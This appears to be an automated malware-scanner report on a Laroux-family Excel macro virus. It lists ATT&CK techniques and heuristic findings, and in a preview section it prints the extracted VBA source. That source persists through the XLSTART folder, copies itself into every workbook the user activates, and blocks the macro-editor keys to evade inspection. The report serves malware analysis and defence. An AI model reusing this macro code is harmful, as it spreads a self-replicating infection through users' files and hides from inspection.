MALICIOUS
208
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1070.004 File Deletion
T1564.001 Hidden Window
The sample is a malicious macro-enabled document detected by ClamAV as Doc.Macro.Laroux-5893719-0. The VBA script within the document attempts to establish persistence by copying itself to the Excel startup folder as 'StartUp.xls'. It also hooks Excel events using Application.OnSheetActivate and Application.OnKey to evade inspection, indicating a sophisticated attempt to maintain its presence.
Heuristics 6
-
ClamAV: Doc.Macro.Laroux-5893719-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.Laroux-5893719-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCEThe macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.Matched line in script
If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then -
VBA infects other workbooks via an OnSheetActivate copy hook high OLE_VBA_WORKBOOK_INFECTION_SPREADERThe macro installs an Application.OnSheetActivate handler that copies a sheet (carrying the macro) into the active workbook whenever a sheet is activated. This is the replication stage of a resident Excel macro virus: it infects every workbook the user opens.Matched line in script
Application.OnSheetActivate = "StartUp.xls!ycop" -
VBA hooks the VBE-editor / macro-list keys to evade inspection high OLE_VBA_VBE_KEY_HOOK_EVASIONThe macro reroutes Alt+F11 (Visual Basic editor) and/or Alt+F8 (macro list) through Application.OnKey, so an analyst's attempt to open the macro code is intercepted. This anti-analysis trick is a hallmark of resident Excel macro viruses hiding the viral module while it is loaded.Matched line in script
Application.OnKey "%{F11}", "StartUp.xls!escape" -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub auto_open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 917 bytes |
SHA-256: ef12d7355755f09cb7ed5d43609aa9c78ce2121e9043188a92ffb406905a8ca9 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "StartUp"
Sub auto_open()
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
Application.ScreenUpdating = False
ThisWorkbook.Sheets("StartUp").Copy
ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
n$ = ActiveWorkbook.Name
ActiveWindow.Visible = False
Workbooks("StartUp.xls").Save
'Workbooks(n$).Close (False)
End If
Application.OnSheetActivate = "StartUp.xls!ycop"
Application.OnKey "%{F11}", "StartUp.xls!escape"
Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub
Sub ycop()
On Error Resume Next
If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
Application.ScreenUpdating = False
n$ = ActiveSheet.Name
Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.